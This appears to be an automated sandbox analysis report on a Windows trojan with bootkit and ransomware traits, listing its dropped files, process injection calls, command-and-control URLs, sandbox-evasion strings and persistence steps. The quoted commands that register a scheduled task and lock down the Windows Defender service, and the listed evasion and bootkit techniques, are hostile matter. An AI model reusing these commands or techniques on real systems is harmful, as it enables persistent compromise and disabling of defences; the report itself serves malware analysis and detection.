        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\upd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\windefender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile created: C:\Users\user\Desktop\upd.exeJump to behavior
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrssJump to behavior
        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@41/15@21/5
        Source: csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmpBinary or memory string: SELECT BuildNumber FROM Win32_OperatingSystemh3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,
        Source: 0NlSa5bf55Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
        Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_01
        Source: upd.exeString found in binary or memory: application/app/install.go
        Source: upd.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
        Source: upd.exeString found in binary or memory: application/resilience/btcblockchain/address.go
        Source: upd.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
        Source: upd.exeString found in binary or memory: application/app/install.go
        Source: upd.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
        Source: upd.exeString found in binary or memory: application/resilience/btcblockchain/address.go
        Source: upd.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
        Source: csrss.exeString found in binary or memory: application/app/install.go
        Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
        Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
        Source: csrss.exeString found in binary or memory: largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2 /bots/scheduled-install23283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakh
        Source: 0NlSa5bf55.exeString found in binary or memory: Mask/AddresOEnv
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: 0NlSa5bf55.exeStatic file information: File size 2095616 > 1048576
        Source: 0NlSa5bf55.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1ff600
        Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: C:\Windows\rss\csrss.exeCode function: 11_3_119322AA pushad ; ret
        Source: 0NlSa5bf55.exeStatic PE information: section name: UPX2
        Source: upd.exe.0.drStatic PE information: section name: UPX2
        Source: csrss.exe.8.drStatic PE information: section name: UPX2
        Source: injector.exe.11.drStatic PE information: section name: _RDATA
        Source: windefender.exe.11.drStatic PE information: section name: UPX2
        Source: bootmgfw.efi.11.drStatic PE information: section name: .xdata
        Source: bootx64.efi.11.drStatic PE information: section name: .xdata
        Source: EfiGuardDxe.efi.11.drStatic PE information: section name: .xdata
        Source: NtQuerySystemInformationHook.dll.11.drStatic PE information: section name: _RDATA
        Source: EfiGuardDxe.efi.11.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
        Source: csrss.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x3a37d7
        Source: bootmgfw.efi.11.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
        Source: bootx64.efi.11.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
        Source: injector.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x54ea2
        Source: windefender.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x20ae45
        Source: 0NlSa5bf55.exeStatic PE information: real checksum: 0x0 should be: 0x20add5
        Source: upd.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a37d7
        Source: NtQuerySystemInformationHook.dll.11.drStatic PE information: real checksum: 0x0 should be: 0x2279d
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior:

        barindex
        Drops executables to the windows directory (C:\Windows) and starts themShow sources
        Source: C:\Users\user\Desktop\upd.exeExecutable created and started: C:\Windows\rss\csrss.exe
        Source: unknownExecutable created and started: C:\Windows\windefender.exe
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\upd.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeFile created: C:\Users\user\Desktop\upd.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
        Source: C:\Users\user\Desktop\upd.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\upd.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
        Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

        Hooking and other Techniques for Hiding and Protection:

        barindex
        May modify the system service descriptor table (often done to hook functions)Show sources
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\0NlSa5bf55.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\upd.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\upd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\upd.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\upd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\windefender.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\windefender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: upd.exe, csrss.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
